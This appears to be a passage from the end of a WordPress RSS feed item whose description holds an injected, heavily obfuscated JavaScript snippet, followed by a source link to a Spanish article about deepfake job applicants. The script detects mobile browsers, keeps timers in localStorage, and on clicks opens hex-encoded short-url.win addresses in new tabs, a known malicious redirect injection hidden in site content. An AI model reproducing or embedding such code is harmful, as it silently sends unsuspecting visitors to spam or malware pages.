_0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/vacantes-remotas-y-los-deepfakes-como-las-empresas-pueden-evitar-la-contratacion-de-postulantes-ultrafalsos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">94538</post-id>	</item>
	</channel>
</rss>
